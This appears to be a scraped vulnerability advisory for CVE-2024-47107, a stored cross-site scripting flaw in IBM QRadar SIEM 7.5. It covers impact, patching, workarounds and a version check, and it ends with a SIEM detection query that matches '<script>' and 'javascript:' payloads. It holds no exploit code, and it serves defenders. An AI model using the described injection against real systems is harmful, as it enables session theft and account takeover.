CVE-2024-47107
📋 TL;DR
IBM QRadar SIEM 7.5 has a stored cross-site scripting (XSS) vulnerability that allows authenticated users to inject malicious JavaScript into the web interface. This could enable attackers to steal session credentials or perform unauthorized actions within authenticated sessions. Only authenticated users can exploit this vulnerability.
💻 Affected Systems
- IBM QRadar SIEM
📦 What is this software?
Qradar Security Information And Event Manager by Ibm
View all CVEs affecting Qradar Security Information And Event Manager →
Qradar Security Information And Event Manager by Ibm
View all CVEs affecting Qradar Security Information And Event Manager →
Qradar Security Information And Event Manager by Ibm
View all CVEs affecting Qradar Security Information And Event Manager →
Qradar Security Information And Event Manager by Ibm
View all CVEs affecting Qradar Security Information And Event Manager →
Qradar Security Information And Event Manager by Ibm
View all CVEs affecting Qradar Security Information And Event Manager →
Qradar Security Information And Event Manager by Ibm
View all CVEs affecting Qradar Security Information And Event Manager →
Qradar Security Information And Event Manager by Ibm
View all CVEs affecting Qradar Security Information And Event Manager →
Qradar Security Information And Event Manager by Ibm
View all CVEs affecting Qradar Security Information And Event Manager →
Qradar Security Information And Event Manager by Ibm
View all CVEs affecting Qradar Security Information And Event Manager →
⚠️ Risk & Real-World Impact
Worst Case
An authenticated malicious insider or compromised account could inject JavaScript that steals administrator credentials, leading to full system compromise and data exfiltration.
Likely Case
Authenticated attackers with basic privileges could inject malicious scripts to hijack sessions, perform unauthorized actions, or steal sensitive data from other users.
If Mitigated
With proper input validation and output encoding, the risk is limited to authenticated users who would need to bypass additional security controls.
🎯 Exploit Status
Exploitation requires authenticated access; stored XSS means payload persists and affects multiple users.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Apply IBM QRadar SIEM 7.5.3 Patch 11 or later
Vendor Advisory: https://www.ibm.com/support/pages/node/7178104
Restart Required: Yes
Instructions:
1. Download the patch from IBM Fix Central. 2. Backup your QRadar configuration. 3. Apply the patch following IBM's installation guide. 4. Restart QRadar services as required.
🔧 Temporary Workarounds
Input Validation Enhancement
allImplement additional input validation for user-controllable fields in the web interface
Content Security Policy
allImplement strict Content Security Policy headers to limit script execution
🧯 If You Can't Patch
- Restrict user permissions to minimize attack surface from authenticated users
- Implement web application firewall rules to detect and block XSS payloads
🔍 How to Verify
Check if Vulnerable:
Check QRadar version via Admin > System & License Management > About QRadarCheck Version:
ssh admin@qradar-host 'cat /opt/qradar/VERSION'Verify Fix Applied:
Verify patch installation in Admin > System & License Management > Installed Patches📡 Detection & Monitoring
Log Indicators:
- Unusual JavaScript injection patterns in web logs
- Multiple failed XSS attempts
Network Indicators:
- Suspicious JavaScript payloads in HTTP requests to QRadar
SIEM Query:
SELECT * FROM events WHERE devicetype=12 AND (UTF8(payload) LIKE '%<script>%' OR UTF8(payload) LIKE '%javascript:%')